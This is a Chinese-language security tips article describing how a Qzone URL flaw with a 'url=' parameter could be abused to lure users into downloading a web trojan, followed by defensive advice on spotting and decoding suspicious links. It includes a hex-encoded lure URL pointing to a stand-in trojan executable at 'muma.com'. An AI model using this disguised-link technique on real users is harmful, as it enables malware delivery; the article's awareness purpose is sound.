一、模擬黑客攻擊

　　 這里，我們首先來了解這個(gè)漏洞的具體情況。Qzone的跨站漏洞是網(wǎng)友無意中打開類似"http://user.qzone.qq.com/QQ號碼?url=任意字母"時(shí)發(fā)現(xiàn)的，這時(shí)網(wǎng)頁顯示為一個(gè)框架網(wǎng)頁，中間為"無法打開網(wǎng)頁"的空白頁面（如圖1）；然而，當(dāng)輸入類似"http://user.qzone.qq.com/QQ號碼?url=http://www.baidu.com"的地址時(shí)卻可以正常顯示，這時(shí)url后的網(wǎng)址其實(shí)在幕后是加載的。那么，Qzone的跨站漏洞又是如何被黑客作為木馬的媒介的呢？

　　 Qzone默認(rèn)加載的地址要小心

　　 第一步：黑客需要對該地址進(jìn)行喬裝改扮一番。比如：網(wǎng)頁木馬的url為"http://www.muma.com/muma.exe"。黑客會(huì)使用URl加密技術(shù)來為木馬地址作掩護(hù)，常用的方法是把url地址轉(zhuǎn)換為16進(jìn)制。

　　 黑客常用URL偽裝器

　　 第二步：黑客將Qzone的地址設(shè)置為"http://user.qzone.qq.com/QQ號碼?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在網(wǎng)頁上貼出Qzone的地址來引誘網(wǎng)友點(diǎn)擊，用戶往往點(diǎn)擊了該地址下載運(yùn)行了木馬還蒙在鼓里。

　　 二、如何防范Qzone攻擊

　　 方法1：既然這一跨站漏洞這么隱蔽，用戶感染的幾率也不會(huì)低。我們需要如何來防范這一漏洞可能造成的危害呢？做到不感染病毒，未雨綢繆是 有效果的。因此，我們在訪問網(wǎng)友的Qzone前，要多長幾個(gè)心眼，要觀察其網(wǎng)址的形式。

　　 一般正常的Qzone的地址是"http://user.qzone.qq.com/號碼"或者"http://號碼.qzone.qq.com/"形式的，如果出現(xiàn)"http://user.qzone.qq.com/QQ號碼?url="的地址就要謹(jǐn)慎了，Qzone也可能出現(xiàn)類似"http://user.qzone.qq.com/號碼/?url=http%3A//photo.qq.com/TIPS_jump.htm%23uin%3D號碼%26albumid%3D393029702%26photoid%3D"的地址，如果地址里面完全沒有QQ的地址段，那么為了防止下載運(yùn)行網(wǎng)頁木馬，可以將url后的字符輸入到ASCII碼隨心換軟件進(jìn)行地址轉(zhuǎn)換（如果是像以上地址的格式，可以將%后的十六進(jìn)制字符逐個(gè)進(jìn)行轉(zhuǎn)換來獲得完整地址），如果url指向可執(zhí)行文件就不能點(diǎn)擊了。

　　 方法2：為了防止系統(tǒng)被種植網(wǎng)頁木馬，還可以安裝殺毒軟件和防火墻并需要開始實(shí)時(shí)文件和網(wǎng)絡(luò)監(jiān)控，這樣即使下載了網(wǎng)頁木馬也會(huì)被清除。如果發(fā)現(xiàn)了可疑的Qzone地址要及時(shí)舉報(bào)，讓黑客成為過街老鼠，毫無藏身之處。

　　 小結(jié):Qzone的跨站漏洞被用來種植木馬具有受眾廣的特點(diǎn)，Qzone的地址經(jīng)過加密化裝后，又有幾個(gè)人會(huì)仔細(xì)地進(jìn)行甄別呢？因此，利用人們偷窺人家隱私空間的好奇心來傳播木馬是很有效果的。

　　 其實(shí)，要防范Qzone地址在你的電腦種植木馬也不難， 簡單的方法就是只點(diǎn)擊QQ資料里的Qzone地址，不去其他網(wǎng)站點(diǎn)擊就可以了。另外，需要使用具有防范IE漏洞的安全工具和殺毒軟件來查殺這類木馬的下載安裝，如：瑞星卡卡。攜帶木馬的Qzone地址一經(jīng)發(fā)現(xiàn)要馬上通知網(wǎng)友，決不姑息，不讓其他人成為黑客的犧牲品。同時(shí)，每次Qzone提示升級我們也 好升級不用嫌麻煩而取消升級，以免被黑客利用其他未知的漏洞。
【看看這篇文章在百度的收錄情況】

相關(guān)文章

• 上一篇： 網(wǎng)絡(luò)論壇漏洞很多
• 下一篇： 清除Adobe捆綁的Bonjour的方法